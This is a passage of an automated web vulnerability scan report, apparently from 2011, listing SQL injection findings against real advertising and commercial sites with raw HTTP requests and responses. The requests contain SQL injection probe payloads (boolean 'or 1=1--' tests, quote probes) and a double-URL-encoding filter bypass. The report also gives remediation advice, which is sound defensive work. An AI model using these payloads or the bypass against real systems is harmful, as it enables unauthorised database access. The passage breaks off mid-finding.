30.87. http://www.rpi.edu/dept/chem-eng/Biotech-Environ/EXPERT/expmed.html

30.88. http://www.wtec.org/loyola/kb/c1_s1.htm

30.89. http://www.yoox.com/_partners/luxury24/luxury24_210x195.html

31. Content type incorrectly stated

31.1. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp

31.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

31.3. http://geoisp.alice.it/settacookie.html

31.4. http://geoisp.alice.it/virgilio/local/create_alice_vlocal_city_cookie.html

31.5. http://geoisp.virgilio.it/geo.php

31.6. http://imagesdotcom.ilsole24ore.com/images2010/SoleOnLine5/Z_Metabox/marketing/Z_Immagini/cedolare%20secca.png

31.7. http://kundenportal.aperto.de/download/zanox/zanox_intro_en.m4v

31.8. http://mail.alice.it/favicon.ico

31.9. http://mightyblue.com/images/windowsserver.gif

31.10. http://modelli-listini.motori.ansa.it/confrontoIndex2.php

31.11. http://nxtck.com/act.php

31.12. https://seal.verisign.com/getseal

31.13. http://techtarget-www.baynote.net/baynote/tags3/common

31.14. http://translate.googleapis.com/translate_a/t

31.15. http://webshop.elsevier.com/framework/cf/ga.cfm

31.16. https://webshop.elsevier.com/framework/cf/ga.cfm

31.17. http://www.ansa.it/web/banner_js/ansa_banner_array.js

31.18. http://www.ansa.it/web/banner_js/msn_banner_array.js

31.19. http://www.ansa.it/web/video/visual.swf

31.20. http://www.autostrade.it/autostrade/service.do

31.21. http://www.difesa.it/sites/archive2/sitecollectionimages/6b4ab7a7-8d36-4529-929c-1e490f70c6e0/93f9e344-cca4-41a4-9b9f-7a7b9682db3e01Medium.jpg

31.22. http://www.difesa.it/sites/archive2/sitecollectionimages/79555011-0a2d-4a2a-9bf2-152ae4aaa117/64389b1d-4203-4207-8f35-604d9317fcb2foto1Medium.jpg

31.23. http://www.difesa.it/sites/archive2/sitecollectionimages/803a045a-610a-4c96-a9a4-475055b67359/1b9b6072-9cb1-4bd5-a0b6-38f08d29fde3zeffiro_torna_a%20_casa_1Medium.jpg

31.24. http://www.difesa.it/sites/archive2/sitecollectionimages/90897531-8ddb-4507-a827-416bdc32b6ac/8d3e95ae-3152-47a8-a9cd-646f83d021ebsts134-s-002Medium.jpg

31.25. http://www.elsevier.com/authored_framework/images/buttons/ordernow.gif

31.26. http://www.elsevier.com/legacy_products/p39/939/939_01_specialissuestab.html

31.27. http://www.eni.com/en_IT/static/flash/homepage_eni_com/visore_header/params.xml

31.28. http://www.eni.com/en_IT/static/flash/homepage_eni_com/visore_header/widgets/xml/reporter/media-box-2-link.xml

31.29. http://www.eni.com/en_IT/static/images/arrow_cerca_footer.gif

31.30. http://www.eni.com/login/LoginServletOSSO

31.31. https://www.eni.com/attachments/images/highslide/graphics/zoomout.cur

31.32. https://www.eni.com/en_IT/static/images/arrow_cerca_footer.gif

31.33. https://www.eni.com/login/LoginServletOSSO

31.34. http://www.ilsole24ore.com/_community/content/commentsaggregator/it/wwwilsole24orecom/art/notizie/20110502/171_aaxmpftd/_jcr_content/par/comments.kaptcha.png/69

31.35. http://www.ilsole24ore.com/_community/content/usergenerated/content/commentsaggregator/it/wwwilsole24orecom/art/notizie/20110502/171_aaxmpftd/_jcr_content/comments/gia_leggendo_l_artic.kaptcha.png/65

31.36. http://www.ilsole24ore.com/_community/content/usergenerated/content/commentsaggregator/it/wwwilsole24orecom/art/notizie/20110502/171_aaxmpftd/_jcr_content/comments/oltretutto_la_fotoe.kaptcha.png/76

31.37. http://www.ilsole24ore.com/php/piuletti/Dotcom2010/dotcom.php

31.38. http://www.ilsole24ore.com/php/piuletti/artratingsvc.php

31.39. http://www.ilsole24ore.com/sez2010/finanza-e-mercati/json/FinanzaMercatiUser/dati_JSON_OPT.json

31.40. http://www.luxury24.ilsole24ore.com/favicon.ico

31.41. http://www.shopping24.ilsole24ore.com/sh4/img/ico-prezzo-periodici.gif

31.42. http://www.shopping24.ilsole24ore.com/sh4/img/ico-prezzo-serviziOnLine.gif

31.43. http://www.telecomitalia.it/ip_presence/

31.44. http://www.telepass.it/AutostradeETIWeb/immagineSpazio

31.45. http://www.webank.it/favicon.ico

31.46. https://www.webank.it/favicon.ico

31.47. https://www.webank.it/webankpub/wb/generaIMG.do

31.48. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp

32. Content type is not specified



1. SQL injection
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [PluID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The PluID parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the PluID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2492235&PluID=0%20and%201%3d1--%20&w=728&h=90&ord=2060797925&ucm=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jBofaIOs07Si00001; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C4=; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0a0; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 03 May 2011 00:12:14 GMT
Connection: close
Content-Length: 1823

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
place(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,5133839).replace(/\[%tp_flightid%\]/ig,2492235).replace(/\[%tp_campaignid%\]/ig,148561);}var ebO = new Object();ebO.w=728;ebO.h=90;ebO.ai=5133839;ebO.pi=0;ebO.d=0;ebO.rnd=4066534413148;ebO.title="";ebO.bt=1;ebO.bv=7.000000;ebO.plt=9;ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("");ebO.ju=escape(ebTokens("http://www.suntech-solar-modules.com/it/commercio"));ebO.iu=escape("Site-34815/Type-0/de0f7579-78e7-4996-8618-33b0aaf929e9.gif");ebO.fu=escape("Site-34815/Type-2/acf62f6b-0918-4a46-85af-ee217e095bae.swf");ebO.fv=9;ebO.ta="-1";ebO.dg="-1";var ebFN="StdBanner";if(0==1)ebFN+="Ex";if(ebO.d)ebFN+="Debug";var ebSrc=ebBigS+"/SBTemplates"+ebSBTemplatesVer+"/"+ebFN+".js?ai=5133839";document.write("<scr"+"ipt src="+ebSrc+"></scr"+"ipt>");var ebAdID=5133839;var ebPli=2492235;var ebDSGID=-1;/* StdSupported */

Request 2

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2492235&PluID=0%20and%201%3d2--%20&w=728&h=90&ord=2060797925&ucm=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jBoraIOs07Si00001; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C4=; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=ba3832db-cb6f-4b2e-a42b-136199543bde3HU050; expires=Sun, 31-Jul-2011 20:12:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 03 May 2011 00:12:14 GMT
Connection: close
Content-Length: 1833

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
place(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,5133851).replace(/\[%tp_flightid%\]/ig,2492235).replace(/\[%tp_campaignid%\]/ig,148561);}var ebO = new Object();ebO.w=728;ebO.h=90;ebO.ai=5133851;ebO.pi=0;ebO.d=0;ebO.rnd=406651141914324;ebO.title="";ebO.bt=1;ebO.bv=7.000000;ebO.plt=9;ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("");ebO.ju=escape(ebTokens("http://www.suntech-solar-modules.com/it/proprietario_casa"));ebO.iu=escape("Site-34815/Type-0/fbf5b323-ff67-49a9-bd5b-8817d7f9a7e5.gif");ebO.fu=escape("Site-34815/Type-2/756a1454-a298-43ff-bffb-9c60d99fd7df.swf");ebO.fv=9;ebO.ta="-1";ebO.dg="-1";var ebFN="StdBanner";if(0==1)ebFN+="Ex";if(ebO.d)ebFN+="Debug";var ebSrc=ebBigS+"/SBTemplates"+ebSBTemplatesVer+"/"+ebFN+".js?ai=5133851";document.write("<scr"+"ipt src="+ebSrc+"></scr"+"ipt>");var ebAdID=5133851;var ebPli=2492235;var ebDSGID=-1;/* StdSupported */

1.2. http://expertsystem.net/page.asp [idd parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://expertsystem.net
Path:   /page.asp

Issue detail

The idd parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the idd parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /page.asp?id=1519&idd=155' HTTP/1.1
Host: expertsystem.net
Proxy-Connection: keep-alive
Referer: http://expertsystem.net/clienti_dettaglio.asp?cd550
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; __utmc=151171949; __utmb=151171949.1.10.1304392426

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 22:40:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 584
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.3. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-7074224334010734&output=js&lmt=1304416766&num_ads=3'&channel=xxxxxxxxxx&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=it&url=http%3A%2F%2Fwww.ilsole24ore.com%2Fart%2Fnotizie%2F2011-05-02%2Fmorte-bin-laden-pakistan-afghanistan-093710.shtml%3Fuuid%3DAaXmPfTD&adsafe=high&dt=1304398765345&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304398766162&frm=0&adk=2511670684&ga_vid=1902530322.1304398766&ga_sid=1304398766&ga_hid=1663585310&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1058&bih=867&ref=http%3A%2F%2Fwww.ilsole24ore.com%2F%3Frefresh_ce&fu=0&ifi=1&dtd=883 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml?uuid=AaXmPfTD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 00:09:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 20506

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
&amp;adurl=http://www.grammarly.com/%3Fq%3Dgrammar";
google_ad.visible_url = "www.Grammarly.com/Grammar_Checker";
google_ad.line1 = "Instant Grammar Checker";
google_ad.line2 = "Correct All Grammar Errors And";
google_ad.line3 = "Enhance Your Writing. Try Now!";
google_ad.regionname = "";
google_ads[18] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://ww
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7074224334010734&output=js&lmt=1304416766&num_ads=3''&channel=xxxxxxxxxx&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=it&url=http%3A%2F%2Fwww.ilsole24ore.com%2Fart%2Fnotizie%2F2011-05-02%2Fmorte-bin-laden-pakistan-afghanistan-093710.shtml%3Fuuid%3DAaXmPfTD&adsafe=high&dt=1304398765345&shv=r20110427&jsv=r20110427&saldr=1&correlator=1304398766162&frm=0&adk=2511670684&ga_vid=1902530322.1304398766&ga_sid=1304398766&ga_hid=1663585310&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1058&bih=867&ref=http%3A%2F%2Fwww.ilsole24ore.com%2F%3Frefresh_ce&fu=0&ifi=1&dtd=883 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml?uuid=AaXmPfTD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 00:09:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 754

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x
...[SNIP]...

1.4. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The clicktag parameter appears to be vulnerable to SQL injection attacks. The payloads 13256991'%20or%201%3d1--%20 and 13256991'%20or%201%3d2--%20 were each submitted in the clicktag parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]13256991'%20or%201%3d1--%20&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:30 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3388

window['wbo_params'] = {
id: 146,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',

...[SNIP]...
496052&C=21277&P=37169&CREA=146&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21081006_gds-ieobanner-box-13-di-16gds-ieobanner-box-7-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304377530'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,'%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D146%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C
...[SNIP]...

Request 2

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]13256991'%20or%201%3d2--%20&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:30 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 3372

window['wbo_params'] = {
id: 56,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',

...[SNIP]...
=496052&C=21277&P=37169&CREA=56&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21080930_gds-ieobanner-box-13-di-16gds-ieobanner-box-13-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304377530'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,'%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D2--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C=212
...[SNIP]...

1.5. http://webshop.elsevier.com/myarticleservices/booklets/ [product_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://webshop.elsevier.com
Path:   /myarticleservices/booklets/

Issue detail

The product_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the product_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the product_id request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /myarticleservices/booklets/?product_id=4556%2527 HTTP/1.1
Host: webshop.elsevier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
